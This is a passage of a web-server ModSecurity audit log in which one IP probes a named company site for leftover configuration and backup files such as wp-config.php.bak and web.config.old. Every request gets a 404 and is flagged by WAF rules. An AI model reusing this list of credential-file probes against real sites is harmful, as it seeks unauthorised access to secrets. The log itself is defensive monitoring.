[rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/app/config/parameters.yml"] [unique_id "aE3USDV1wc8MD9ZPjDFaGgAAAAM"] Stopwatch: 1749931080180398 4659 (- - -) Stopwatch2: 1749931080180398 4659; combined=2827, p1=535, p2=2199, p3=0, p4=0, p5=92, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d9bff828-Z-- --af28871f-A-- [15/Jun/2025:01:28:00.305071 +0530] aE3USKxP6lni_rLDdWJbbQAAAAw 185.177.72.108 57332 127.0.0.1 7081 --af28871f-B-- GET /app/config/routes.cfg HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --af28871f-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --af28871f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/app/config/routes.cfg"] [unique_id "aE3USKxP6lni_rLDdWJbbQAAAAw"] Stopwatch: 1749931080301811 3315 (- - -) Stopwatch2: 1749931080301811 3315; combined=2018, p1=354, p2=1603, p3=0, p4=0, p5=61, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --af28871f-Z-- --c23c607c-A-- [15/Jun/2025:01:28:00.653968 +0530] aE3USOh_Rdu0duNoj2H4igAAAAo 185.177.72.108 57376 127.0.0.1 7081 --c23c607c-B-- GET /admin/.config HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c23c607c-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c23c607c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/admin/.config"] [unique_id "aE3USOh_Rdu0duNoj2H4igAAAAo"] Stopwatch: 1749931080650766 3260 (- - -) Stopwatch2: 1749931080650766 3260; combined=1902, p1=345, p2=1495, p3=0, p4=0, p5=62, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c23c607c-Z-- --46e3a80c-A-- [15/Jun/2025:01:28:01.201930 +0530] aE3USTV1wc8MD9ZPjDFaGwAAAAM 185.177.72.108 57436 127.0.0.1 7081 --46e3a80c-B-- GET /web.config HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --46e3a80c-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --46e3a80c-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config"] [unique_id "aE3USTV1wc8MD9ZPjDFaGwAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/web.config"] [unique_id "aE3USTV1wc8MD9ZPjDFaGwAAAAM"] Stopwatch: 1749931081197718 4288 (- - -) Stopwatch2: 1749931081197718 4288; combined=2570, p1=452, p2=2008, p3=0, p4=0, p5=109, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --46e3a80c-Z-- --3fb5f816-A-- [15/Jun/2025:01:28:01.318114 +0530] aE3USaxP6lni_rLDdWJbbgAAAAw 185.177.72.108 57450 127.0.0.1 7081 --3fb5f816-B-- GET /web.config.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3fb5f816-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --3fb5f816-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config.bak"] [unique_id "aE3USaxP6lni_rLDdWJbbgAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/web.config.bak"] [unique_id "aE3USaxP6lni_rLDdWJbbgAAAAw"] Stopwatch: 1749931081314149 4047 (- - -) Stopwatch2: 1749931081314149 4047; combined=2292, p1=475, p2=1700, p3=0, p4=0, p5=116, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3fb5f816-Z-- --6ffd3b1e-A-- [15/Jun/2025:01:28:01.433289 +0530] aE3USUMAAEyWrtlsmo2MxwAAAAc 185.177.72.108 57474 127.0.0.1 7081 --6ffd3b1e-B-- GET /web.config.bakup HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6ffd3b1e-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6ffd3b1e-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config.bakup"] [unique_id "aE3USUMAAEyWrtlsmo2MxwAAAAc"] Stopwatch: 1749931081430061 3291 (- - -) Stopwatch2: 1749931081430061 3291; combined=1977, p1=380, p2=1532, p3=0, p4=0, p5=65, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6ffd3b1e-Z-- --058ff66f-A-- [15/Jun/2025:01:28:01.549015 +0530] aE3USSUp1gCWWDzKyjSMDAAAAAs 185.177.72.108 57480 127.0.0.1 7081 --058ff66f-B-- GET /web.config.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --058ff66f-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --058ff66f-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config.old"] [unique_id "aE3USSUp1gCWWDzKyjSMDAAAAAs"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/web.config.old"] [unique_id "aE3USSUp1gCWWDzKyjSMDAAAAAs"] Stopwatch: 1749931081545298 3786 (- - -) Stopwatch2: 1749931081545298 3786; combined=2297, p1=387, p2=1817, p3=0, p4=0, p5=93, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --058ff66f-Z-- --4257eb28-A-- [15/Jun/2025:01:28:01.664668 +0530] aE3USeh_Rdu0duNoj2H4iwAAAAo 185.177.72.108 57512 127.0.0.1 7081 --4257eb28-B-- GET /web.config.temp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4257eb28-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4257eb28-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config.temp"] [unique_id "aE3USeh_Rdu0duNoj2H4iwAAAAo"] Stopwatch: 1749931081661361 3362 (- - -) Stopwatch2: 1749931081661361 3362; combined=1957, p1=376, p2=1521, p3=0, p4=0, p5=60, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4257eb28-Z-- --827e4838-A-- [15/Jun/2025:01:28:01.780173 +0530] aE3USZOn_2b0s5j3TtOJpAAAAAY 185.177.72.108 57524 127.0.0.1 7081 --827e4838-B-- GET /web.config.tmp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --827e4838-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --827e4838-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config.tmp"] [unique_id "aE3USZOn_2b0s5j3TtOJpAAAAAY"] Stopwatch: 1749931081776674 3554 (- - -) Stopwatch2: 1749931081776674 3554; combined=2095, p1=416, p2=1623, p3=0, p4=0, p5=56, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --827e4838-Z-- --669a1a00-A-- [15/Jun/2025:01:28:01.896449 +0530] aE3USVj2r5sYBjRDYxhz9QAAAAU 185.177.72.108 57540 127.0.0.1 7081 --669a1a00-B-- GET /web.config.txt HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --669a1a00-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --669a1a00-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/web.config.txt"] [unique_id "aE3USVj2r5sYBjRDYxhz9QAAAAU"] Stopwatch: 1749931081892717 3807 (- - -) Stopwatch2: 1749931081892717 3807; combined=2207, p1=475, p2=1663, p3=0, p4=0, p5=68, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --669a1a00-Z-- --38d79025-A-- [15/Jun/2025:01:28:02.011978 +0530] aE3USjV1wc8MD9ZPjDFaHAAAAAM 185.177.72.108 57554 127.0.0.1 7081 --38d79025-B-- GET /wp-config.inc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --38d79025-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --38d79025-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.inc"] [unique_id "aE3USjV1wc8MD9ZPjDFaHAAAAAM"] Stopwatch: 1749931082008660 3372 (- - -) Stopwatch2: 1749931082008660 3372; combined=1994, p1=413, p2=1523, p3=0, p4=0, p5=58, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --38d79025-Z-- --eba52e3c-A-- [15/Jun/2025:01:28:02.127275 +0530] aE3USqxP6lni_rLDdWJbbwAAAAw 185.177.72.108 57558 127.0.0.1 7081 --eba52e3c-B-- GET /wp-config.old HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --eba52e3c-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --eba52e3c-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.old"] [unique_id "aE3USqxP6lni_rLDdWJbbwAAAAw"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.old"] [unique_id "aE3USqxP6lni_rLDdWJbbwAAAAw"] Stopwatch: 1749931082123968 3363 (- - -) Stopwatch2: 1749931082123968 3363; combined=2032, p1=405, p2=1544, p3=0, p4=0, p5=82, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eba52e3c-Z-- --94cbf703-A-- [15/Jun/2025:01:28:02.244012 +0530] aE3USkMAAEyWrtlsmo2MyAAAAAc 185.177.72.108 57560 127.0.0.1 7081 --94cbf703-B-- GET /wp-config.php.bak HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --94cbf703-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --94cbf703-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.bak"] [unique_id "aE3USkMAAEyWrtlsmo2MyAAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.sarainternational.ae|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.bak"] [unique_id "aE3USkMAAEyWrtlsmo2MyAAAAAc"] Stopwatch: 1749931082239968 4115 (- - -) Stopwatch2: 1749931082239968 4115; combined=2473, p1=555, p2=1818, p3=0, p4=0, p5=100, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --94cbf703-Z-- --3e511a0b-A-- [15/Jun/2025:01:28:02.364383 +0530] aE3USiUp1gCWWDzKyjSMDQAAAAs 185.177.72.108 57566 127.0.0.1 7081 --3e511a0b-B-- GET /wp-config.php.dist HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3e511a0b-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 04 Sep 2024 11:42:46 GMT ETag: "328-62149ac424b46" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --3e511a0b-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarainternational.ae"] [uri "/wp-config.php.dist"] [unique_id "aE3USiUp1gCWWDzKyjSMDQAAAAs"] Stopwatch: 1749931082360905 3556 (- - -) Stopwatch2: 1749931082360905 3556; combined=2099, p1=419, p2=1619, p3=0, p4=0, p5=61, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3e511a0b-Z-- --9c378031-A-- [15/Jun/2025:01:28:02.480538 +0530] aE3USqlFM0RY285MG1CIWAAAAAk 185.177.72.108 57574 127.0.0.1 7081 --9c378031-B-- GET /wp-config.php.inc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9c378031-F-- HTTP/1.1 404 Not Found Last-Modified: Wed, 